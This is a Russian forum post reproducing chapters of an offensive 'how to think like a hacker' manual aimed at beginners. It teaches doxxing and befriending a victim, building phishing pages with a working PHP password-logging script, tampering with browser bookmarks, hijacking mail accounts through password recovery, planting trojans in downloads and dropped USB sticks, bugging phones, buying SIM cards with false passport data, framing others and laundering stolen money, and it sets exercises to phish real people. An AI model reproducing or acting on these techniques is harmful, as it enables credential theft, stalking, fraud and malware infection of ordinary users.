На заметку МЫСЛИТЬ КАК ХАКЕР

Тема в разделе "Любимые книги и журналы, а также вырезки", создана пользователем Hooko, 11 янв 2017.

↑ ↓
  1. Hooko Уважаемый пользователь
    Hooko
    Ответить в чате

    Форумчанин

    Регистрация:
    24.08.2016
    Сообщения:
    218
    Симпатии:
    200
    Пол:
    Мужской
    Репа:
    +221 / 4 / -4
    Jabber:
    Введение
    Итак, мой друг, ты решил стать хакером. Ты, конечно же, знаешь Delphi, VB, JAVA, PHP, HTML, MYSQL? Не знаешь даже, что значат эти страшные слова? Ничего, всему свое время. Информацию следует искать по мере ее надобности. Если ты чего-то не знаешь, не нужно бегать по форумам и ждать ответа от умных гуру, или плакать, что задача трудна, и тебе не по силам. На большинство вопросов в сети уже есть ответы – нужно только правильно сформулировать поисковый запрос и гугл/яндекс найдут тебе все что пожелаешь..
    Чтобы стать настоящим хакером нужны как минимум три вещи
    - Сильное желание стать хакером, готовность учиться новому, отсутствие лени…
    - Нестандартное мышление
    - Умение пользоваться поисковиками!!!
    Многие юные герои думают, что существуют специальные программы для взлома чего-либо. Кулхацкеры полагают, что есть какая-то супер-ломалка интернета с большой красной кнопкой, при нажатии на которую, взламывается любой аккаунт. Эти бедные люди лазают по сети, моля великих хакеров дать им эту чудодейственную программу, на что хакеры беззлобно смеются и дают им ссылки на различные вирусы и смс-алармы. Некоторые особо совестливые посылают молодых на яндекс, или предлагают ознакомиться с Metasploit.
    Программы для хакеров безусловно существуют но применяются они в основном для поиска уязвимостей на сайтах и локальных компьютерах, либо удаленного администрирования. Вы можете конечно купить уже готовый, достаточно дорогостоящий троян (если уверенны что у вас хватит знаний им правильно воспользоваться). Вы можете использовать Brutus в надежде что пароль подберется (хотя любой более менее сложный пароль брутом подобрать нереально).
    Однако я огорчу наших юных друзей - чтобы быть хакером нужно все таки быть еще и программистом. Даже чтобы пользоваться готовыми программами для взлома - нужны умения - программа найдет какую то уязвимость - но вам нужно еще и понять, какой эксплойт использовать для вскрытия системы через найденную дыру, как этот эксплойт применить, и как сделать это все анонимно, чтобы вас не поймали суровые дяденьки из отдела К...
    Хакер это не тот кто ломает - это тот кто делает все красиво, и может достать любую нужную ему информацию. Нет ничего интересного в дефейсе какого нибудь vasya.ucoz.ru и надписи на его главной странице Я МЕГАХАЦКЕР САЙТ ВЗЛАМАН!!! Гораздо интереснее написать трояна который будет присылать вам пароли от необходимых аккаунтов, заразить пользователя или группу пользователей этим трояном и незаметно собирать базу полезных вам паролей.
    Любой взлом должен нести какую то пользу для хакера. Спортивный интерес конечно круто - но все таки лучше извлекать из взлома как можно больше полезной информации. Ваши действия должны быть направлены именно на взлом, а не на слом системы. Ведь опытный взломщик квартир не вбегает с шумом и криками вышибая двери, и не рисует на стенах надписи Здесь был Вася!!!, напротив он по-тихому, без суеты, открывает дверь отмычкой и уносит из квартиры только ценные вещи, а то и вообще ограничивается деньгами. В нашем случае все точно также. Хакер - это аристократ компьютерного мира. Он не должен строить из себя клоуна..
    Нужны конкретные цели для атаки! Необходимо научиться писать свои трояны, использовать сканеры уязвимостей и найденные уязвимости, а также в обязательном порядке изучить Социальную инженерию, поскольку психологические дыры в разуме человека гораздо опаснее программных уязвимостей в его системе. Зная психологию и познакомившись с жертвой по сети, искусный хакер может простым обманом заставить жертву установить троян, не используя ни одной серьезной уязвимости для проникновения внутрь системы, кроме глупости и некомпетентности атакуемого юзера.
    Поэтому прежде чем бежать на форум и кричать дайте мне прогу для взлома mail.ru, или слезно умолять - Есть тут настоящие хакеры, помогите мне взломать Пентагон, лучше купите книгу по Delphi или С++, напишите простенький самодельный троян отсылающий нужные вам данные на почту, протестируйте его на своем компьютере, изменяя код так чтобы антивирус его не замечал - а потом выберите цель и с помощью Социальной инженерии впарьте кому-нибудь этот троян... Это даст вам гораздо больше практического опыта по взлому, чем чтение в сети кучи устаревших теоретических статей по различным видам атак, или поиска исходников уже готовых вирусов.
    В книге не дается листингов готовых троянов, потому что со временем защита ОС меняется, меняются также базы сигнатур антивирусов. Кусочки кода для выполнения тех или иных действий – например отсылка украденной информации хакеру или перехват нажатий клавиш можно найти в интернете. Методом проб и ошибок нужно лишь выбрать или переписать их код так, чтобы он был невидим для антивирусов. В настоящем пособии описаны общие приемы действия взломщиков и хакерские уловки, задействующие различные методы для получения доступа к требуемой информации.

    Глава 1 Сбор информации
    Главная уязвимость в компьютерных системах - это сами пользователи.
    Не обязательно писать вирусы на ассемблере, чтобы взломать систему, которой управляет человек. Проще обманом вытащить из него нужную нам информацию.
    У хакеров это называется Социальная инженерия (СИ) - воздействие на других людей, с целью получения от них какой либо информации. Воздействуют чаще всего обманом в сочетании с техническими методами. Запомните раз и навсегда что все гениальное просто. Чем выбивать дверь проще позвонить и представиться контроллером электроэнергии. Чтобы вас не остановили и не обыскали менты иногда достаточно нести в руках букет цветов. Так же и с взломом систем - в любом взломе должен по максимуму использоваться фактор уязвимости человеческого характера перед различными видами обмана. Использовать в своих целях можно что угодно - лень, глупость, страх, любопытство, половое влечение, жадность, тщеславие, доверие, леность, сочувствие, срочность и.т.д.
    Нужно атаковать жертву с той стороны откуда она не ждет опасности, подменять то что ей привычно своими фальшивками, говорить от лица того кому она доверяет, обещать золотые горы, помогать с целью входа в доверие и.т.д.
    Прежде чем начать атаку хакер должен как можно больше разузнать о жертве. Нас должно интересовать все - характер, интересы, увлечения, сайты, где бывает жертва, личности ее друзей, биография, место работы/учебы, все контактные данные. В зависимости от полученной информации в дальнейшем выбираем подходящий метод обмана, вхождения в доверие, а также способ контакта (реал, виртуал, через левых людей, втемную, через троян). Пройдите по всем поисковым системам(в том числе по поиску социальных сетей и почтовых сервисов) вводя по очереди и в комбинациях имя и фамилию жертвы, ее город, ник, е-mail, дату рождения, телефон, адрес. Чем уникальнее ник, фамилия или имя жертвы, и чем больше она проводит время в сети, тем больше у нас появляется шансов найти нужную информацию. Всю найденную информацию систематизируйте и используйте для новых поисковых запросов, и так до тех пор, пока не соберете на жертву досье. Поглядите ее анкеты на разных сайтах, узнайте, чем она увлекается, на почве этого увлечения познакомьтесь с ней от двух вымышленных лиц разных полов на каких-то тематических сайтах, либо по аське или по mail-агенту.
    Жертва сама вам расскажет немало интересного о себе, достаточно спросить...
    Допустим, нам известна фамилия (пусть будет, к примеру, Ирина Балуркина) или уникальный ник (к примеру, Balurchonok) и город где живет жертва (Омск)
    1) Открываем по очереди рамблер, гугл, яндэкс, поиск аськи, поиск mail.ru агента, вконтакте, одноклассников, мой круг и мой мир, вводим туда все комбинации известных ключевых слов, например Ирина Балуркина, Омск
    Балуркина, Balurchonok, Омск Balurchonok
    Смотрим результаты поиска и видим места, где объект бывает в интернете, в частности социальные сети, либо другие сайты.… Берем блокнотик, выписываем все что найдется возраст, дату рождения, город, адрес, имена и ники друзей, интересы, дату последнего посещения, рост, вес, частоту посещений, сохраняем фото и любую другую важную информацию на свой компьютер..
    Комбинируем полученную информацию, составляем новые запросы, например Омск Ирина Балуркина, 19.02.93, Ирина 19.02.93 рост 162, Balurchonok 19.02.93, Balurchonok Madonna (это уже запрос по интересам объекта) и.т.д. смотрим, что выдаст по новым запросам, и, узнав новую информацию, делаем еще пару прогонов различных комбинаций слов по поиску
    Если Ира зарегистрирована на сайте где адрес мыла скрыт и неявен, пошлите ей письмо через форму связи этого сайта, ответ в 50% случаев придет на вашу почту с ее обратным адресом.
    2 ) Найдя места/сайты/форумы в сети где объект обитает, вступаем в сообщества в которых он состоит, налаживаем средства связи с ним, знакомимся с левых ников, говорим, что вы тоже интересуетесь бисероплетением / выращиванием кактусов и прочим чем интересуется объект. Стараемся стать сетевым другом объекта, помогаем ему информацией нужной ему, и.т.д. Навязчивость здесь будет излишней.
    Хорошо если объект, к примеру, задал на форуме вопрос, а вы ответили, и, на почве этого произошло знакомство. Из разговоров с объектом после знакомства постепенно узнаем о его личной жизни и увлечениях.
    Узнав чем интересуется объект подсовываем ей ссылку на быстро созданный вами сайт по нужной теме, в загрузках которого интересная жертве информация, с вклеенными троянами-шпионами, позволяющими следить за ней. Через различные социальные сети вроде mail.ru, вконтакте и одноклассников находим друзей и знакомых объекта, знакомимся с ними, узнаем круг общения нашей Иры... Если у нее имеется блог в mail.ru, твиттере или ЖЖ обязательно читаем все записи, также смотрим ее комментарии на чужие записи в блогах
    чтобы примерно понять характер объекта, ее отношение к людям..
    3) Узнав город и фамилию объекта, находим телефонную книгу этого города, вводим фамилию, ищем домашние телефоны, и адреса, если их слишком много, обзваниваем с левого номера, просим позвать Иру, если позовут,
    отключаемся.. В случае с Ирой, хорошо бы, чтобы звонки проводила какая-нибудь ваша хорошая знакомая, женским голосом, а в случае если бы искали мужчину нужно говорить мужским голосом.. Если есть доступ к паспортной базе, находим паспортные данные по месту прописки.. Если имеется база сотовых/домашних телефонов, ищем ее номер.. Ищем также фото/карту района, где она живет, вычисляем магазины, салоны красоты поблизости, в которые она может ходить
    4) Используем обработанную информацию для составления досье, расставляем акценты над главными вещами, приоритетами, интересами и если это было изначально задумано, назначаем встречу, либо "случайно" встречаем нашу Иру после работы, откуда она по имеющимся данным возвращается примерно ближе к 14:00.. Знакомимся, идем на контакт, ужин вечером, брак по расчету, развод… Шучу. Мы ведь хакеры, а не брачные аферисты. Но смысл, думаю понятен.
    Если для получения необходимой информации можно поступить проще, поступайте проще.. Однако даже самый банальный взлом может сорваться, когда недостаточно информации об объекте. Поэтому этапу сбора информации нужно всегда уделять должное внимание
    Иногда можно просто позвонить человеку, и сказать, что ваша фирма создает телефонный справочник города, и вы хотели бы уточнить некоторую информацию. Можно выведать информацию под видом соц.опроса, позвонив и представившись журналистом какой-нибудь газеты. Точно так же можно провести соцопрос в реале, приодевшись и походив по квартирам жертв вооружившись официальной папочкой с бланками... Соц. опросы страшная вещь. На одном сайте висели всякие голосования,
    - Каким антивирусом вы пользуетесь, какой браузер вы предпочитаете, используете ли вы обновлениями безопасности от Microsoft… Пользователи, принимавшие участие в опросах, по сути, сообщали хозяину сайта информацию, с помощью которой можно было подобрать для каждого юзера персонально настроенный троян или эксплойт, и это притом, что IP-адрес пользователей всегда виден админу.… На некоторых сайтах висят психологические тесты, в которых встречаются вопросы типа, - Любите ли вы готовить, Ваше любимое блюдо, Были ли у вас домашние питомцы, Как их звали. После ответов жертвы становится возможным взлом через сервис восстановления паролей по контрольному вопросу, который есть почти на каждом крупном сайте.
    Бывает полезно носить с собой portable версию программы восстановления удаленных данных, с помощью которой можно украсть данные которые, казалось бы, уже удалены и не представляют никакой опасности. Также с собой нужно всегда иметь флешку-граббер, которая при контакте с портом любого компьютера автоматически копирует на себя нужные нам данные - cookies мессенджеров, браузеров, файлы с хэшами паролей (лежат в папке Application data - вместо пути к ней введите в Выполнить или строку проводника Windows слово %APPDATA%), и различные документы с ключевыми словами в именах их файлов или в тексте заголовка. Кроме этого если есть возможность нужно заразить компьютер жертвы противоположной программой, которая наоборот грабит все вставляемые в компьютер флешки на предмет вышеописанных файлов и прячет награбленное в скрытом каталоге, к которому мы впоследствии можем иметь доступ. В некоторых браузерах при непосредственном доступе к компьютеру жертвы можно посмотреть сохраненные пароли, пользуясь стандартными средствами, предусмотренными в меню браузера.
    Чтобы прочесть архив чужого mail-агента, копируем папку mra с чужого компьютера. Она по умолчанию находится в папке %APPDATA%\Mra\
    Теперь садимся за свой компьютер… Находим у себя эту папку… делаем резервную копию, что бы потом назад восстановить свою историю. Заменяем свою mra на чужую. Отключаем подключение к интернету. Запускаем mail агент. "Меню"->"Добавить учетную запись" Вводим email того человека у которого мы украли папку mra, и вводим любой пароль. Надо ОБЯЗАТЕЛЬНО поставить галочку «сохранить пароль». Если её не поставить в папке mra с именем этого мыла перезапишется файл clist4.txt. в котором хранится список контактов. Если все-таки забыли поставить галочку, просто опять перезапишите файл и перезапустите mail агент. Когда в статусе будет висеть "подключение", меняем его на "отключен", появится список контактов. Выключаем опцию "показывать только online контакты" и появятся все его контакты с историей сообщений.
    Имитировав поломку мобилы жертвы при личном знакомстве с ней можно сказать, что у вас есть знакомый, который недорого (или бесплатно) отремонтирует сотку. Получив в распоряжение телефон объекта, вы можете узнать все его контакты, пароль от почты (в куках браузера и в файлах агента), установить на телефон шпионское ПО, украсть аккаунты, привязанные к номеру телефона и.т.д.
    Вообще сотовый для хакера - довольно полезная вещь.. Иногда, если вы стоите рядом с рабочим местом жертвы достаточно иметь под рукой мобильник с включенной камерой направленный на клавиатуру, на которой набирают пароль..
    С помощью маленьких камер от сотовых, фотографировали даже набор ПИН кода в банкоматах. Также из любого дешевого мобильника можно сделать настоящий прослушивающий жучок - Достаточно поменять микрофон на более чувствительный и сделать переходник между звонком и зеленой кнопкой на клавиатуре. Звонок и вибрацию, в целях маскировки, необходимо обязательно отключить, для этого достаточно выдернуть разъем звонка из платы. Также желательно отключить подсветку дисплея в целях экономии заряда. При входящем вызове — телефон сам «берет трубку» и Вы прослушиваете все, до чего дотянулся микрофон. По окончании соединения телефон – шпион отключается до следующего раза. Необходимо иметь батарею большой емкости и оплатить трафик. Сам аппарат желательно выбирать с маленькими размерами и энергопотреблением. Сейчас нетрудно приобрести сотовый телефон Б/У (чтобы IMEI был на чужое имя) и симку - говоришь, что забыл паспорт и слезно просишь подключить, мотивируя это чем угодно.- утверждаешь что помнишь все паспортные данные или носишь их записанные с собой (естественно ненастоящие)- диктуешь их и ура, у тебя новый, совершенно чистый сотовый. Рекомендуется не звонить с него по номерам своих ближайших знакомых и своим, т.к. в случае проверки спецслужбами все контакты будут заноситься в базу и пробиваться..
    Практические задания:
    1) Открой поисковик Яндекс и введи в него следующие вопросы
    - Что такое cookies?
    - Что такое эксплойт?
    - Что такое кейлоггер?
    - Что такое фейк?
    - Что такое социальная инженерия?
    - Где хранятся пароли агента?
    - Где хранятся пароли Оперы?
    - Что такое FTP?
    - Как залить файлы на хостинг?
    - POST и GET запросы
    - Что такое Brutus?
    Почитай об всех этих вещах, и если что то будет непонятно вводи это непонятное в поиск и пытайся понять..
    2) Зарегистрируйте на mail.ru левый аккаунт, заполните анкету, загрузите фото (не свое). Найдите в поиске mail.ru агента абсолютно незнакомого вам человека, и попытайтесь узнать о нем как можно больше из открытых источников. Зайдите на его мир набрав в адресной строке браузера http://foto.mail.ru/mail/его_логин/ Поглядите список его друзей, его записи в блог и гостевую книгу, анкету. Выпишите его анкетные данные и логин и вводите их комбинации в поисковики, ища, на каких сайтах он еще светился. Постарайтесь познакомиться и подружиться с этим человеком по сети, войти к нему в доверие. Это будет небольшая тренировка.
    3) Установите себе две версии Windows – самую популярную и самую свежую (например, Win XP и Windows 8). Раздобудьте несколько популярных антивирусов. В дальнейшем, это пригодится вам для тестирования ваших троянов в различных условиях
    4) Если вы еще не умеете программировать, купите бумажную книгу по Delphi, C++ или VB. Кроме этого скачайте FAQ-и по этим языкам программирования, где уже есть готовые кусочки кода

    Глава 2 Подмена, фальшивка, фейк
    Подделывается все что угодно - личность, электронный адрес, письма от начальства, программы в которых работает пользователь..
    Пример фейка - фальшивая страницы сайта, которая выглядит в точности как
    страница для входа на какой-нибудь сайт. Фейк посылает введенные в него логин и пароль на скрипт, скрипт записывает пароли в файл и пересылает жертву на какой-нибудь третий адрес, например на страницу авторизации настоящего сайта.
    Регистрируемся на любом хостинге c поддержкой PHP (например, Бесплатный хостинг PHP CGI) и ставим туда скрипт, наподобие этого
    <?php
    $f=fopen("ak.txt","a");
    fwrite($f,$_GET['login']."\r\n");
    fwrite($f,$_GET['password']."\r\n");
    fclose($f);
    header('Location: http://mail.ru');
    ?>
    Поля login и password это поля будущего фейка они могут называться по другому соответственно именам полям ввода в html форме фейка на эти. ak.txt это файл куда запишутся пароли и имена пользователей его и скрипт фейка надо поместить на PHP хостинг и указать права записи rw-rw-rw (777). Чтобы сделать собственно фейк надо сохранить страницу авторизации нужного сайта как html файл, открыть эту страницу в блокноте, проанализировать, найти все ссылки на графику, скачать все картинки, используемые в этой странице, в коде формы с полями в свойстве action пишем http адрес нашего скрипта, а в свойстве method пишем POST. Потом помещаем фейк и все картинки на свой сайт (желательно без рекламы внизу) и далее начинается социальная инженерия. Например, нам нужно взломать почту на уа.ru. Узнаем про того кого хотим взломать как можно больше информации, поглядев на его друзей, находим с кем он давно не общался. Пишем через сервис, который подменивает обратный адрес почты, письмо якобы от лица этого друга. Пишем привет такой то и такой то, я вот тут сайт сделал, хочешь поглядеть? И даем ссылку на фейк. В странице фейка должно быть написано над полем ввода ошибка, вы не авторизованы. Жертва идет на сайт якобы друга, и попадает на наш фейк, но ей кажется, что ее просто из почты выкинуло, потому что, внешне фейк похож на почту, еще и написано - ошибка вы не авторизированны и человек естественно пытается войти снова в почту, через наш фейк. Пароли идут в наш файл, а скрипт пересылает жертву на настоящую страницу авторизации яндэкса, жертва думает да что ж такое, опять... Вводит опять пароль и попадает, наконец-то, в свою почту. Но пароль уже у нас
    Представим, что у какой-нибудь девушки сегодня день рождения (или Новый год)
    Используем социальную инженерию и поздравляем жертву от имени какого-то сайта, где она бывает... Узнаем e-mail жертвы, в поздравлении пишем текст поздравления и ссылку с названием - Ваш подарок находится здесь. А вместо подарка подсовываем фейк, или пишем что для просмотра подарка введите свой логин и пароль… а после кражи паролей фейком пересылаем жертву на красивую настоящую поздравительную открытку…
    На Delphi совсем нетрудно написать код который отслеживает (через DDE, например) текущие адреса сайтов, вводимые в браузеры. При этом существует замечательная функция ShellExecute, которая позволяет через командную строку послать любому браузеру команду на открытие другого сайта. В принципе ничто не мешает использовать это для подмены настоящих сайтов фальшивыми - юзер вводит в строку ввода mail.ru, и как только начинает грузиться mail.ru, троян, уловив адрес, отсылает на браузер команду открыть сайт-фейк mail.ru
    По адресу C:\Documents and Settings\имя_пользвателя\Application Data\Opera\Opera\speeddial.ini находится замечательный файл, в котором хранятся закладки панели быстрого запуска Оперы
    Файл, открытый в блокноте имеет вид
    [Speed Dial 1]
    Title=Mail.Ru: почта, поиск в интернете, новости, игры
    Url=Mail.Ru: почта, поиск в интернете, новости, игры
    Reload Enabled=0
    Reload Interval=0
    Reload Only If Expired=0
    .................................
    Тут еще несколько подобных записей
    Этот файл нельзя изменять, пока Опера открыта. Но Опера ведь не всегда открыта.
    Наш вирус вполне себе может изменить значение Url, не меняя при этом Title
    [Speed Dial 1]
    Title=Mail.Ru: почта, поиск в интернете, новости, игры
    Url=http://feikmail.ru/
    Reload Enabled=0
    Reload Interval=0
    Reload Only If Expired=0
    Так мы можем легко изменить адрес любой закладки на адрес фальшивого сайта имитирующего mail.ru и сделанному нами заранее с целью кражи паролей. После авторизации на нашем фальшивом сайте пароли запишутся нам в лог, а PHP скрипт переадресует юзера на настоящий mail.ru и в принципе даже может авторизовать его там, через GET запрос…
    Ну а что мешает нам сделать самодельный браузер, закладки которого являются фальшивыми фейками на настоящие сайты? Если писать браузер самому, то вполне можно сделать так, что даже в адресной строке будут отображаться адреса не фейков, а нормальных сайтов, и после переадресации никто ничего не поймет. Более того, глядя как современные юзеры используют браузеры, я заметил, что в меню браузера при интернет серфинге они лезут максимум затем, чтобы сохранить страницу или выкачать что-то через менеджер закачек. Самое смешное если создать примитивный браузер внешне похожий на Оперу, и поддерживающий только вкладки, брожение по сети, и закачку файлов, очень долгое время никто не заметит разницы, потому что липовые пункты меню никто даже трогать не будет по причине ненадобности. А если вы впарите юзеру липовый браузер то чего уж говорить - вы обретете полный контроль над его паролями, системой и аккаунтами... Если не получилось заменить весь браузер то можно заменить адресную строку в нем, точнее не в нем, а поверх него. Создается специальное окно, видом, размерами и положением на экране соответствующее адресной строке браузера которым пользуется жертва. Эта фальшивая строка позиционируется поверх оригинальной, запускается, сворачивается, и меняет положение на экране параллельно с оригинальным браузером. Вводимые в строчку адреса вызывают их открытие в браузере через системные команды открытия адреса в браузере, но например, при вводе mail.ru жертву посылает не на mail.ru, а на наш фейковый сайт, копию mail.ru.. Пароли уходят к нам, а скрипт автоматически перенаправляет жертву на оригинальный mail.ru. Имея фальшивую адресную строку, и фальшивую строку состояния, (чтобы не палиться при загрузке страницы фейка) мы можем украсть пароли с любого сайта, на который у нас имеется фейк
    Банки часто используют дополнительные одноразовых пароли, список которых выдается пользователю. Причем пароли принимаются, только в указанной последовательности: пока пароль N1 не будет использован, N2 не сработает. Но мошенники и это научились преодолевать. Пользователь заходит на страницу банка, забивает пароль. Поселившийся в его компьютере троян фейком имитирует отказ в авторизации и предлагает ввести другой пароль. Удивленный пользователь на всякий случай пытается войти по второму паролю - сработало, доступ к счету получен! Вот только получен он при вводе первого пароля. А второй, на самом деле еще не использованный, попадает в руки хакеров..
    Замена программ на программы-фейки может выполняться двумя способами - либо юзверь сознательно качает и устанавливает фейк думая, что это реальная программа, либо троян втемную подменяет программу уже установленную на компьютере. Также можно искать на диске и подменять установочные файлы программ, тогда есть вероятность что рано или поздно юзверь сам скачает эти программы своим друзьям, а также при любой переустановки системы ваша программа также будет сознательно им переустановлена. Липовые программы могут либо полностью (не полностью) повторять интерфейс и функциональность оригиналов, либо просто внешне притворяться программой, а после совершения нужных хакеру действий (например, ввод пароля в фальшивый mail агент) либо выдавать кучу сообщений об ошибках, нехватке какого-то компонента ОС, либо обратно подменять себя настоящими программами. Фейковая программа может посылать команды оригинальной как, например, в случае с фальшивой адресной строкой браузера
    Можно сделать примитивную программу внешне как самая новая аська или как агент почты, только при подключении она не соединяется с сервером, а скидывает
    тебе на скрипт логин и пароль, после этого выдавая какую-нибудь системную ошибку для маскировки. Ее можно выложить в обменнике - и собирать пароли.
    Допустим, кто-то взломал ваш агент, прочитал архив переписки и изучил стиль письма ваших друзей. Когда Вы находитесь оффлайн, логин Вашего друга добавляется в игнор, а в список контактов добавляется новый контакт с логином злоумышленника созвучным с удаленным в игнор логином вашего друга, для анкеты которого используются данные и фото друга. Очень высока вероятность, что Вы не заметите подмены, и злоумышленник, общаясь с вами от лица вашего друга, выведает у вас необходимую ему информацию. Более того, если взломать одновременно контакт какого-нибудь парня и его девушки то вполне возможно поссорить их, заменив им контакты на свой и устроив диалог с фразами, идущими через вас (man in the middle) спровоцировать ссору, так что парень будет думать, что виновата девушка и наоборот. Точно так же это можно использовать при переговорах бизнес партнеров по электронным системам сообщений вроде агента и ICQ.
    Как правило, любой аккаунт, где зарегистрирован пользователь, привязан к его почте. Собираем немного информации о владельце этого мыла, а далее пишем жалобное письмо в службу поддержки почты - типа некоторое время назад мою почту увели злые люди, или как вариант - я забыл пароль. Пишем убедительно, жалобно, но уверенно, с другого адреса, созвучного первому. Тогда 60% процентов, что вам вышлют пароль на эту почту. Для того чтобы послать письмо для восстановления пароля на mail.ru достаточно собрать информацию о жертве и перейти по следующей ссылке
    Ошибка — Почта Mail.Ru

    Если вы взломали почту и хотите взломать любой другой аккаунт жертвы, то просто притворитесь на нужном сайте что забыли пароль. Письмо с новым паролем, придет на взломанную почту, прочтите его и удалите это письмо так, чтобы хозяин почты ничего не заметил.
    Если у вас есть пароль на чужую почту, вы всегда можете прочитать чужой архив mail агента прямо на сайте mail.ru, по умолчанию там включено сохранение сообщений (а если выключено – включите – жертва ничего не заметит). Старайтесь читать архив в то время, когда жертва спит – например, поздно ночью (рано утром)
    Ссылки на хак-скрипты лучше отсылать через аську, форум, или агент чем через почту, т.к. письмо это подозрительно, а мимоходом упомянутая в разговоре ссылка такой подозрительной не кажется. Взломав почту, прежде всего, сохраните себе все контакты юзера и все его письма, а потом в оффлайне изучайте их, ища письма о регистрации на других сайтах.
    Имея информацию о людях, с которыми юзер общается, мы можем немало о нем узнать. Обязательно сохраняйте и исследуйте всю их переписку. Зная, о чем они общаются, вы сможете взломать и его друзей тоже. Если умный чел давно переписывается со знакомой блондинкой, то чтобы взломать умника, сначала взломайте блондинку что будет легче, а потом от ее имени пошлите ему письмо с темой о которой они недавно говорили в переписке. А в письме ссылка соответствующая теме общения. От давней знакомой подвоха наш умный человек не ждет.
    Про контрольные вопросы и прочее. Некоторые юзеры до сих пор ставят на контрольные вопросы осмысленные ответы, которые легко угадать, пообщавшись в асе или по телефону с жертвой и невзначай спросив ее, например, как зовут твоего песика или какое твое любимое блюдо. Некоторые девчонки ставят вместо пароля дату своего рождения, номер своего телефона или телефона своего парня. Еще любят создавать комбинации из букв своего имени и цифр года рождения, считая это НУ ОЧЕНЬ СЛОЖНЫМ паролем. Если вы взломали почту, первым делом измените контрольные вопросы. Пароль сразу не меняйте, вы всегда сможете сменить его, ведь даже если хозяин поменяет пароль, вы узнаете новый пароль через измененный вами контрольный вопрос. Иногда даже если юзер везде применяет разные пароли, он может применить на разных сайтах одинаковые контрольные вопросы. Создайте специально с целью взлома жертвы интересный липовый сайт, где при регистрации нужно указывать ответ на один из нескольких контрольных вопросов, среди которых вставьте первым такой же, как у вашего юзера на почте. Есть шанс, что он выберет его, и ответ будет ваш…
    У современного пользователя зачастую одновременно открыто в браузере несколько вкладок. Специальным образом сформированная страница с java скриптом может открыть еще несколько новых вкладок с фейками. Закрывая их, пользователь может нечаянно ошибиться и закрыть настоящий сайт, оставив фейковую вкладку открытой и посчитав ее настоящим сайтом
    Вообще любой сайт, на котором люди регистрируются, потенциальный источник информации для хакера. Создайте сайт знакомств, поиска работы или липовое фотомодельное агентство, в форме для регистрации укажите побольше пунктов и гребите информацию лопатой.. У 30-40%; юзеров пароли на ваш сайт и почту совпадут. Взломайте для начала какую нить девочку, ищущую знакомств. Спросите, зачем нам она? А вдруг у ней папа бизнесмен, и они с ним пользуются одним компом?.. Создайте с помощью CMS-шаблона небольшой полноценный сайт (форум, липовая соц.сеть с липовыми персонажами) с информацией по интересам жертвы, с регистрацией и троянами-шпионами незаметно вшитыми в каждый файл в загрузках сайта..

    Глава 3 Приемы кулхацкеров

    Одно время один из бесплатных хостингов был по техническим причинам временно недоступен. В это время хакер позвонил хозяину сайта и трагическим голосом сообщил, что он сотрудник поддержки хоста, а хост полетел, и теперь он обзванивает владельцев с целью установить их логины и пароли для восстановления. Хозяин сайта зашел на свой сайт и увидел, что хост действительно не работает. Поверив хакеру, хозяин сказал ему id и пароль, и хакер с радостью увел его сайт. А хостинг через пару часов стал работать…
    Владельцу банковской карты (девушке) отправили SMS сообщение с информацией о том, что некий банк отказал ей в выдаче кредита. Примерно через месяц после этого начали звонить, с требованием погасить просрочку, а когда жертва возмутилась, что они что-то напутали, у нее "уточнили" персональные данные банковской карты
    Если вы взломали чей-то сайт, надо сразу встраивать своих троянов в ехе-шники всех его загрузок, и вписывать нужные скрипты в страницы. Таким образом, мы с помощью этого сайта поимеем еще и его клиентов. Если имеешь такой чужой сайт с твоими троянцами, замани нужного клиента на этот сайт. Если что, потом стрелки можно перевести на владельца этого сайта типа он взломщик.
    Если взломали кошелек, переведите большую часть денег тому на кого хотите свалить вину. Если потом вас поймают, говорите что он заказчик, а вы всего лишь исполнитель. Грязные ворованные электронные деньги отмывают покупкой и перепродажей, какой либо важной информации.. Если путь денег отследить еще можно, путь информации отследить нельзя. Например, купите какую нить базу данных, выложите ее на какой-нибудь сайт, не делая на нее ссылок. Теперь база вроде как общедоступна, но знаете про нее только вы. Теперь ее можно продать каким-нибудь заинтересованным в ней лицам, пусть и дешевле, но деньги уже будут чистые. Если поймают, все чисто, базу вы нашли случайно, она, ведь как бы, в открытом доступе.
    Чтобы обналичить деньги хакеры разместили в iTunes и Amazon свои музыкальные треки и принялись сами их скачивать, расплачиваясь деньгами с украденных банковских карт.
    Подарок веб-дизайнеру
    Для этого развода нужно иметь шаблон какой-нибудь полностью настроенной СMS системы с красивым дизайном, которую можно за день развернуть на любом бесплатном хостинге... Итак, схема действий такова. Регистрируем красивое имя бесплатного домена, кладем на хостинг CMS.. Сознательно изменяем СМS так чтобы у сайта была дыра позволяющая узнать пароль админа. Идем в поисковик, ищем кучу статей на тему, которая интересна жертве. Копируем статьи на сайт.
    Получается небольшой, но очень привлекательный для жертвы сайт. Знакомимся с жертвой (лучше чтоб вы были уже знакомы, и жертва знала вас как веб-дизайнера). В новостях сайта, и комментариях к ним, пишем переписку с несуществующим соадмином сайта. Далее, предлагаем жертве стать админом, дескать, у меня нет времени заниматься сайтом, а ты этой темой интересуешься. Только поменяй пароль, чтоб соадмин мой бывший у тебя сайт не отобрал.. Наивный чукотский юноша идет в админку, меняет пароль, а мы идем в оставленную нами дыру, глядим пароль. В большинстве случаев пароль совпадает с тем паролем, который наш незадачливый друг использует в любых других местах
    Практические задания:
    1) Создайте фейк mail.ru, создайте фейк какого-то сайта, на котором вы бываете. Впарьте кому-нибудь ссылку на фейк так, чтобы человек обязательно авторизовался на вашем фальшивом сайте и при этом ничего не заметил
    2) Найдите в гугле/яндексе/рамблере
    - Кто такой Кевин Митник?
    - Как взломать почту?
    - Как впарить троян?

    Глава 4 Впаривание троянов

    Злоумышленник от имени официальной организации, какого-то сайта, где зарегистрирован пользователь, либо от имени его друзей отправляет e-mail, содержащий во вложении классную книжку, компромат на жертву, интересную программу, смешное фото. Точно так же техника применяется и в реале - сотруднику подсовывается флешка с информацией, которая ему необходима или интересна, туда же вшивается троян-шпион. Если нужно закинуть троян в какую-то фирму можно просто прийти, и незаметно оставить или забыть где-нибудь возле рабочих мест диск (флешку) с мелкими логическими играми в каждую из которых зашейте ваш троян. Тогда спустя какое-то время, вся фирма будет играть в эти игры и троян распространят сами сотрудники.
    В письме с вложенным вредоносным документом в формате Microsoft Word
    говорится о том, что на компанию жалуются клиенты. Заинтригованный
    получатель обращается за подробностями к вложенному файлу, в котором они
    якобы описаны, и таким образом, заражает свой компьютер.
